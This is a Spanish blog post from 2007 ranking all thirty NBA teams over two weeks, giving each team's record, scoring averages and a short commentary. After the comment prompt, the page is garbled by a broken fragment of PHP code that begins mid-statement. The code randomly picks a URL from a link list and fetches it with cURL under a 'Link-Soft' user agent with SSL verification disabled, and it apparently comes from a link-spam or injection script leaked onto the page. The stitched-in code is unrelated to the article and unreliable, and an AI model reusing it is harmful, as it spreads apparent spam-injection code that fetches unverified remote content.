El Termómetro de la NBA

18 de December de 2007 por telekoman

La semana pasado no pudimos ofrecer nuestro Termómetro particular así que en esta edición ofrecemos ración doble. Nuestro análisis de lo visto en las dos semanas anteriores en la NBA. Y en nuestra particular visión debemos destacar por encima de todos a los Portland Trail Blazers de nuestro Sergio Rodríguez que han sido capaces de encontrar la motivación adecuada para ganar los 7 partidos que han disputado. Por supuesto, seguimos encantados con la garra y efectividad de los Celtics de Garnett, Allen y Pierce que se alzan a nuestro primer puesto por múltiples razones. Y el descalabro de equipos como Utah, candidatos a hacer algo importante este año, o Cleveland, que han perdido casi todo lo que han jugado.

Nuevamente debemos destacar a los dos jugadores españoles que mejor lo están haciendo. Calderón ha vuelto de nuevo a la titularidad tras la efímero vuelta a las canchas de T.J. Ford y los Raptors siguen ganando. Y Navarro que ha demostrado quien debe ser el que se juegue los balones cuando llegue el final del partido y el marcador esté apretado.

Equipos que más suben: Portland Trail Blazers (10), Washington Wizards y Philadelphia 76ers (4)

Equipos que más bajan: Utah Jazz y Cleveland Cavaliers (5), New Jersey Nets, L.A. Clippers, Charlotte Bobcats y Memphis Grizllies (4)

Equipo (Posición anterior) Balance Ataque / Defensa

Comentario


1

Boston (3)

20 – 2 100,7 (11) / 86,5 (1) En lo más alto de nuestra lista bisemanal debemos situar sí o sí a Boston. Y por varios motivos. Tras 22 partidos sólo han perdido 2. Continúan invictos tras 12 partidos en casa. Ganan los partidos desde la defensa. Permitir sólo 86,5 puntos de media ya es para enmarcar, pero fijándonos sólo en los partidos de casa, esa media se reduce a 80,7, una barbaridad. Y llevan una racha de 9 partidos ganados consecutivos, lo cual quiere decir que han ganado los 6 partidos que han disputado estas dos semanas. Y eso que los dos últimos eran sin Ray Allen, uno de los vértices del Big Three. A este ritmo pueden marcar registros históricos.

2

San Antonio (1)

18 – 5 100,5 (12) / 93,0 (3) San Antonio ha dejado su puesto a Boston en el peldaño más alto de nuestra lista tras 2 semanas en las que, afortunadamente para ellos han jugado sólo 5 partidos. La lesión de Duncan que le ha llevado a perderse 4 partidos ha supuesto un problema para el equipo de Popovich, y aún así consiguieron ganar a Dallas y Utah con el paso al frente de jugadores como Ginobili y Oberto . Los partidos perdidos antes los Warriors y Lakers, este último también sin Parker, sólo pueden considerarse meros accidentes. Ya con Duncan de vuelta, aunque todavía al ralentí, los Spurs no han tenido problemas para librarse de los Nuggets, manteniendo a Oberto a un gran nivel.

3

Phoenix (4)

17 – 7 109,5 (1) / 104,5 (26)

Tienen la mejor marca en ataque, pero su defensa es de las peores y eso les hace bajar enteros. Su trío mágico, Nash – Marion – Stoudemire, está al nivel del de Boston, pero llevan 5 derrotas más, 3 de ellas en casa. Son capaces de perder con Miami, pero lo dejaron para el arrastre para los dos partidos siguientes, o con Minnesota, ganando a gallitos como Toronto, Utah o Washington. Por eso el baloncesto nos gusta tanto, por que a veces es totalmente imprevisible.


4

Detroit (7)

17 – 7 99,7 (13) / 91,2 (2) Detroit es, junto a San Antonio, la mejor definición de un equipo dominante. Tienen grandes jugadores, quizás no estrellas de la talla de LeBron, Iverson, Garnett o el mismo Duncan, pero son capaces de imponer siempre el ritmo que más les conviene, machacando al contrario desde la defensa. Durante estas dos semanas ha ganado 6 de los 8 partidos que ha disputado, perdiendo sólo frente a los irregulares Houston y a Chicago y son también fijos para ganar el título de su división. Incluso para ganar el de Conferencia si las lesiones llegan a Boston. Billups está anotando y dirigiendo con facilidad, y los hombres altos, tanto veteranos como McDyess y Wallace, como noveles como Maxiell están rindiendo a buen nivel. Esta semana que hoy empieza traerá el primer enfrentamiento con Boston, en el Garden. Choque de trenes.

5

Orlando (2)

17 – 8 103,7 (7) / 99,0 (16) Malas semanas para el equipo de Orlando que ha pasado al último puesto de nuestro Top 5. Las derrotas ante Indiana, Atlanta, Milwaukee y sobre todo Memphis, han abierto los ojos a los aficionados sobre la fragilidad del equipo. Y más tras la lesión de Lewis. El puesto de Center está más que cubierto con Howard, pero el base del equipo, Nelson, ha dado muestras de flaqueza. Siguen siendo líderes de la división SouthEast, pero los Wizards están más cerca. Lo cierto es que es difícil que salgan de Playoffs, pero no pueden confiarse. Especialmente en defensa donde en los últimos partidos han dado excesivas facilidades. Y a los equipos que vienen no se les pueden dar facilidades: Dallas, Houston, Utah y Boston. El Oeste casi al completo.

6

Dallas (8)

16 – 9 101,4 (10) / 97,8 (11)

Nadie esperaba unos Mavericks tan arrolladores como la temporada pasada. Pero la versión de este año es un tanto frágil como demuestran las derrotas ante San Antonio, Denver y Toronto. Es posible que sea una estegia de Avery Johnson para llegar en óptimas condiciones a Playoffs y que no les ocurra como el año pasado. Lo cierto es que Nowitzky, el líder natural del equipo, no está desarrollando su mejor juego y salvo contadas excepciones como ante Denver, su aportación en forma de puntos está bastante alejada de sus registros habituales. Por contra Josh Howard sí está funcionando bien, y las victorias generalmente son gracias a él y en los últimos partidos, gracias también a Jason Terry. Si es una táctica, puede llevar a los aficionados al infarto.


7

New Orleans (6)

15 – 9 96,2 (18) / 94,5 (7) Estar quinto en el salvaje Oeste tiene mucho más mérito de lo que parece. Y más cuando 2 de tus titulares se lesionan. Pero si en tu equipo tienes a un base como Chris Paul, las cosas se simplifican. El joven base está haciendo una gran campaña, ajustando perfectamente su juego a lo que su equipo demanda. Que Peterson, Stojakovic y West están presentes, a dirigir y asistir. Que faltan los tiradores, a tirar y llevar tu mejor marca anotadora hasta los 43 puntos. Si a esto le sumamos un West que está haciendo grandes partidos y un Chandler que es capaz de coger 22 rebotes en un sólo partido, el resultado sólo puede ser un equipo capaz de ganar a cualquiera.

8

L.A. Lakers (11)

14 – 9 107,1 (3) / 102,0 (24) Los Lakers son otros de los ganadores de esta doble semana. Han ganado 5 de los 6 partidos que han disputado y tan sólo perdieron ante la batuta de Baron Davis y sus Warriors y tras dejar Kobe la cancha por problemas físicos. La mejoría de Bynum es evidente y aunque todavía no está entre los grandes, ya apunta maneras. Lamar Odom alterna buenos partidos con otros no tan buenos y eso desespera a los muchos aficionados de los Lakers que han dejado de creer en él como segunda espada del equipo en favor del joven pivot. Y mientras Kobe a los suyo, manteniendo una media de 26 puntos por partido.

9

Denver (9)

14 – 10 106,3 (4) / 103,0 (25)

Los Nuggets son un equipo desordenado y anárquico y eso les va bien. Les sirve para mantenerse cuartos en el Oeste, lo cual es bastante complicado. Pero el equipo es demasiado irregular y como le pasa a Houston, depende demasiado de Iverson y Anthony. Los porcentajes de tiro son malos, y aun así su ataque es de los mejores. Señal de que la cantidad de tiros es grande. Los ataques son poco elavorados. El primero que llega la tira. El problema estará más adelante, cuando los grandes del Oeste afinen la defensa, las canastas no entren y Denver tenga que luchar de verdad por defender su plaza. Pero eso está lejos en el tiempo y de momento los de George Karl no parecen estar muy preocupados.


10

Utah (5)

14 – 11 104,9 (5) / 99,5 (18) Utah ha caído 5 puestos esta semana debido a la malísima racha de 6 derrotas consecutivas encadenadas. Gran parte de las derrotas han sido fuera de casa, donde mantiene un balance francamente negativo de 5 victorias y 9 derrotas. Los malos resultados no se deben sin duda a Boozer, que sigue manteniendo unos registros impresionantes. La causa hay que buscarla en la bajada de prestaciones de Deron Williams y en la pésima semana de Kirilenko y Okur culminada con la lesión de este último. Y si no quieres caldo, aquí tienes 3 tazas. La próxima semana Utah se va de viaje al Este para enfrentarse a Atlanta, Charlotte, Orlando y Miami.

11

Toronto (12)

14 – 11 98,0 (16) / 94,6 (8) Tan sólo Boston y Phoenix han sido capaces de frenar a Toronto en estas dos semanas. Y eso que las bajas han sido numerosas e importantes. En el partido frente a Charlotte faltaron T.J. Ford, Bosh, Garbajosa y Bargnani, 4 integrantes del quinteto titular que el ganó el título de división el año pasado. Y aún así se ganó. Destaca sobre todas la aparatosa lesión de Ford tras la falta del Rookie de Atlanta Horford. Por suerte para el equipo canadiense, pueden presumir de tener la mejor pareja de bases de la liga. Calderón está poniendo el precio de su renovación muy elevado y es posible que el año que viene, siendo ya agente libre, mejore su contrato sustancialmente. Estas semanas han encadenado 4 victorias que les llevan a ponerse 5 del Este. Deben apretar viendo que el primer puesto de la división Atlántica parece asignado por decreto a Boston.

12

Washington (16)

13 – 10 101,6 (9) / 99,3 (17)

Si tras 6 partidos sólo has perdido con los Phoenix Suns, es que tu semana ha sido buena. Así se deben sentir los aficionados de Washington con su equipo. Los Wizards están haciendo una buena campaña, engrandecida por el hecho de jugar sin su lider, Arenas. Butler y Jamison están ambos por encima de 20 puntos y 10 rebotes de media y sacan de manera solvente los partidos. Junto a ellos Haywood es el complemento perfecto en los rebotes. Sólo hay un punto negro en el horizonte. La lesión de Daniels, el sustituto de Arenas en el puesto de base, perturba la plácida vida capitalina.


13

Golden State (10)

13 – 11 108,1 (2) / 107,0 (30) Baron Davis puede empezar a reclamar en este momento el título de “Base del ShowTime” de esta temporada. El equipo que dirige juega bien, rápido y efectivo. El único pero es que no defiende. Eh, pero hablamos de Don Nelson, no es Popovich. Los partidos de los Warriors son siempre vibrantes e interesantes. Jackson mete puntos con fluidez y Biedrins está dando más rendimiento de lo que se esperaba. Los Warriors sólo sufren cuando se enfrentan a equipos rocosos como Detroit, San Antonio o Portland. Está por ver si consiguen la machada de clasificarse para Playoffs por segundo año consecutivo, pero mientras tanto, que les quiten lo bailao.

14

Indiana (13)

12 – 12 103,9 (6) / 105,0 (27) Lo de los Pacers tiene poca explicación. En estas dos semanas ha ganado a un buen equipo como Orlando, uno regular como Chicago y uno malo como los Heat. Pero es que también ha perdido contra una bueno como los Suns, uno regular como Portland, y uno malo como Cleveland. La reaparición de su jefe de filas, Jermaine O’Neal no ha supuesto el salto de calidad esperada por muchos. Tinsley, Dunelavy y Granger son la imagen de la irregularidad y eso se refleja en los resultados. Esta semana se enfrenta a 4 equipos asequibles. Veremos si son capaces de salir del 2-2.

15

Portland (25)

12 – 12 95,5 (19) / 97,9 (12)

Tras un inicio bastante malo, sobre todo fuera de casa, parece que el equipo de Portland ha despertado. Y lo ha hecho con fuerza, ganando los 7 partidos. No han sido partidos con grandes diferencias, no han arrasado a sus rivales, pero han ganado. Y a rivales con cierta entidad como Golden State, Denver o Utah. Y en algunos partidos con la baja de Aldridge aquejado de una fascititis plantar que le ha mantenido fuera los últimos 4 partidos. La aportación insospechada como 6º hombre de Travis Outlaw y el paso al frente de Brandon Roy, junto con las aportaciones de Webster, Jones, Pryzbilla, Frye han permitido a los fans de los Trail Blazers olvidarse de Oden y sus rodillas. Nadie podía pensar que a estas alturas de la temporada estuvieran con el balance de victorias y derrotas igualado.


16

Houston (15)

12 – 12 93,8 (23) / 93,3 (4) Tras un buen inicio, los Rockets han ido cayendo en la clasificación hasta el punto de equilibrar su balance de victorias y derrotas. Y estas dos semanas lo han corroborado. Tres victorias y tres derrotas. Cuando los Rockets ganan lo hacen gracias a la aportación casi exclusiva de McGrady (como ante Mamphis con el primer triple doble de la temporada y tercer de su carrera) y Yao. Cuando pierden es por lo mismo. La teoría dice que es fácil ganar a Houston. Parar a McGrady o a Yao, el resto no cuenta. La práctica dice que no es fácil pararlos, pero no imposible. Pero a este ritmo tienen difícil entrar en Playoffs y eso sería un duro golpe.

17

Atlanta (20)

11 – 12 92,4 (27) / 93,6 (5) Buenas semanas para Atlanta que se acerca a la igualdad en su balance con 5 victorias y 3 derrotas. Los jovenes Hawks capitaneados por un gran Joe Johnson, han puesto tierra de por medio con sus perseguidores, pero los equipos de la zona alta se les siguen atragantando. Las derrotas ante Toronto y Detroit así lo demuestran. En medio de la semana el sobresalto de la lesión de T.J. Ford como resultado de la falta flagrante de Horford. Creemos en la inocencia del gran rookie de Atlanta, pero se merecía el partido de sanción.

18

Milwaukee (18)

10 – 13 95,2 (20) / 99,7 (19)

Al contrario de lo sucedido con Atlanta, la semana no puede considerarse buena para los Bucks. No sólo por el balance final de victorias y derrotas, 3 a 5, si no por el juego desplegado. Las derrotas sonrojantes ante Boston, previsible, y Golden State, no tan previsible, deben hacer cambiar el rumbo de la franquicia. El liderazgo de Michael Redd no parece dar el resultado buscado y es probable que necesiten un jugador que acapare menos tiros o que tenga mejores porcentajes. Pero claro, viendo las alternativas dentro del equipo, quizás lo lógico sea tirar lo más posible. En todo caso, se esperaba más de un Bogut que apunta maneras, pero al que le falta regularidad para poder ser considerado uno de los grandes pivots del momento.


19

Cleveland (14)

10 – 14 96,5 (17) / 101,0 (20) Estas dos semanas han sido un infierno para Cleveland. Tras una racha negativa de 6 derrotas propiciadas por la lesión de LeBron, la vuelta de éste, junto a la resucitación de Larry Hughes, permitió a los Cavaliers ganar cómodamente a Indiana. Pero fue un espejismo en el desierto. Los actuales campeones del Este no son un equipo, son tan sólo un conjunto de jugadores que ocasionalmente juegan con LeBron. Ilgauskas ya no es lo que era, Gooden es demasiado irregular, Gibson aparece sólo de cuando en cuando y a Larry yHughes casi ni se le espera. Con esto, es realmente difícil que King James consiga la gesta del año pasado. Por ahora están fuera, muy fuera, de los Playoffs

20

Philadelphia (24)

10 – 14 93,4 (25) / 93,9 (6) Quiero destacar un jugador por encima de los demás de Philadelphia. No, no se trata de Iguodala. No, tampoco de André Miller. El elegido es Samuel Dalembert. No tiene prácticamente cartel en esta liga, fuera de ella es un perfecto desconocido. Sin embargo, estas dos semanas ha sido capaz de llevar a los Sixers ha ganar 5 de los 8 partidos. El equipo se apoya en él hora tanto en defensa como en ataque, algo que antes no pasaba y sufre el día que no está bien, como ocurrió frente a Sacramento. Asegura más de 12 rebotes por partido y tiene margen de mejora en ataque. Evidentemente, no es un jugador capaz de ganar sólo los partidos, pero de vez en cuando este tipo de jugadores también merecen nuestro reconocimiento.

21

New Jersey (17)

10 – 14 90,6 (30) / 96,4 (10)

Parece que este año el culebrón Kidd de todos los años está afectando el rendimiento de la franquicia. Durante estas dos semanas los Nets sólo han conseguido ganar por partida doble a Cleveland, la primera de ellas sin Lebron, perdiendo los 5 partidos restantes. Pobre vagaje para un equipo que pretende meterse en Playoffs y retener a Jason Kidd. El efecto Jefferson parece que está empezando a desvanecerse y aunque Carter parece dispuesto a retomar el testigo, la debilidad interior de los Nets es evidente. Lo único positivo en la franquicia de New Jersey es que Kidd, Mr Triple-Doble, sigue sumando, y ya van 94.


22

Sacramento (23)

9 – 14 98,3 (14) / 101,7 (22) Los Kings parecen dispuestos a terminar su reconstrucción y rejuvenecimiento mandando a Ron Artest fuera del equipo. Eso dejaría el futuro en manos de Kevin Martin, Salmons, Udrih, Francisco García, Brad Miller, etc. Es posible que sea una buena reconstrucción pero a día de hoy, y como pasa siempre, el futuro es bastante incierto. Con tan sólo 3 partidos bastante distanciados entre sí, los Kings tendrán tiempo de intentar solucionar el problema de dirección de juego que es lo que más lastra al equipo.

23

L.A. Clippers (19)

9 – 14 94,3 (21) / 98,8 (15) Nueva semana de caída libre para los Clippers que han pasado del 6º lugar al 23 en sólo 7 semanas. Pero es que el equipo no da para más. Las lesiones han dejado el equipo mermado hasta estremos insospechados. Brand, Cassell, Livingstin, Thomas. El rosario de nombres importantes es demasiado largo. Sólo Kaman no ha pasado por ello. Las pocas victorias de los angelinos han venido de su mano y de la de Maggette, y ante equipos mediocres como Philadelphia, New Jersey y Memphis. Eso sí, todas fuera de casa. Esta semana reciben a Toronto y visitan Dallas y San Antonio. Se antoja difícil que la caída no continúe.

24

Chicago (26)

8 – 13 92,0 (28) / 95,6 (9)

Lentamente Chicago va levantando cabeza. El problema es que es que a este ritmo es posible que no consiga alcanzar los Playoffs. Gordon va recuperando su tiro, Hinrich se permite incluso hacer triples dobles como ante los Knicks y Deng recupera el protagonismo perdido. Pero está claro que al equipo le falta confianza y encadenar una buena racha de resultados. El problema es que Lakers, Washington, Boston y Houston no están muy de acuerdo con eso.


25

Charlotte (21)

8 – 14 91,9 (29) / 98,1 (13) ¿Quiere ganar a los Bobcats? Es fácil. Anule a Raymond Felton. El jugador de North Carolina se ha convertido en el motor principal del equipo y si el rival consigue parar su dirección de juego, el resto del equipo sufre mucho para anotar. Tras un buen inicio de temporada los equipos rivales ya saben cual es la tecla a presionar para ganar, por lo que Charlotte baja hasta el puesto 25 de nuestra lista, siendo de los peores ataques de la liga. Pero Felton tiene toda nuestra confianza y seguro que conseguirá que Wallace, Okafor y Richardson mejoren sus números. El resto del equipo es una incógnita, ya que el banquillo es muy escaso y el equipo anda cansado.

26

Memphis (22)

7 – 16 103,5 (8) / 105,8 (29) Semanas horribles para los Ositos que han encadenado una racha de 6 derrotas consecutivas, rotas tras la victoria, sin Gasol, sobre Orlando. Este es sin duda un caso especial de “falta de defensa galopante”, enfermedad que debe producir cansancio al mirar al contrario. Siendo uno de los mejores ataques de la liga, debe ser profundamente frustrante para los aficionados perder continuamente. Y además perder por márgenes generalmente estrechos. El partido ganado a Orlando fue el primero que se ganó cuando el marcador reflejaba una diferencia inferior a 5 puntos. Es bastante posible que los triples de Navarro hayan tenido algo que ver. Sigue siendo un equipo sumido en una fuerte crisis de identidad, que no sabe cuando debe correr y cuando no, si le conviene hacerlo o si no le conviene. El máximo perjudicado: Gasol.

27

New York (30)

7 – 16 94,2 (22) / 101,7 (22)

Tras el desastre del Boston Garden, Jamaal Crawford pidió perdón en el siguiente partido desde el centro de la cancha a los aficionados en el Madison. Parece que sólo a él y a Randolph realmente le importa. En estas dos semanas, los Knicks sólo han conseguido ganar a sus vecinos de New Jersey, por dos veces, perdiendo los 5 restantes, Seattle incluido. Es lamentable que una franquicia con la historia de los Knicks se vea avocada a esto por la mala cabeza de sus dirigentes, entrenadores e incluso jugadores. Volviendo a Crawford. El escolta de los Knicks está pasando por un buen momento, siendo menos alocado y seleccionando mejor los tiros. Por su parte Randolph, aunque con rachas, parece que intenta volver a ser el jugador dominante que era en Portland. El resto del banquillo es un erial y en ocasiones, como el caso de Marbury, un culebrón.


28

Seattle (28)

7 – 18 98,1 (15) / 105,3 (28) Eran el equipo resucitador. Equipo en crisis que pasaba por aquí, equipo que ganaba. Ahora le han pasado ese testigo a otros equipos como Miami, Minnesota o Memphis, pero es complicado que abandonen las últimas posiciones de nuestra lista. Esta doble semana ha sido positiva, con 4 victorias en 7 encuentros frente a Clippers, Bucks, Knicks y Timberwolves, equipos con las mismas dificultades que Seattle. Mientras tanto Durant sigue con paso firme hacia un título de Rookie del Año que está decidido desde la lesión de Oden.

29

Miami (27)

6 – 17 93,5 (24) / 98,3 (14) Los aficionados de Miami deben estar pensando en cómo es posible que un equipo se transforme así en sólo dos años. Del equipo campeón de hace temporadas a este que pena por los últimos puestos de nuestra lista hay diferencias fundamentales. La mayor de ellas es la edad. Shaq tiene dos años más y actualmente ya sólo asusta al GM de su franquicia cuando ve su salario. Wade ya no es Flash, sólo su sombra, y aunque sigue siendo el puntal de su equipo, no está siendo capaz de ganar él sólo los partidos. La falta de una base es alarmante (en Los Ángeles todavía se están riendo por el contrato de Smush) y cuando el mejor de tu equipo es Haslem, lo único que puedes hacer es temblar. Esta temporada se hará muy larga para Miami. Mientras tanto, Pat Riley pasa a formar parte de la prestigiosa y escasa lista de los entrenadores que han llegado a las 1200 victorias. Lenny Wilkens y Don Nelson le reciben gustosos.

30

Minnesota (29)

3 – 19 92,8 (26) / 101,0 (21)

Los Timberwolves son, con diferencia, el peor equipo de la NBA.Sólo 3 victorias en lo que va de temporada lo acredita. Pero nadie les pide más. En una temporada claramente de transición, los chicos de Minnesota sólo tienen la obligación de darlo todo cada partido y esperar que el Draft les proporcione un buen jugador que acompañe a Al Jefferson y Randy Foye. El problema actual de los Timberwolves es que los buenos partidos de sus chicos casi nunca coinciden. cuando lo hacen son capaces de ganar incluso a Phoenix. Es posible que esta semana que viene vuelva a sonar la flauta.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>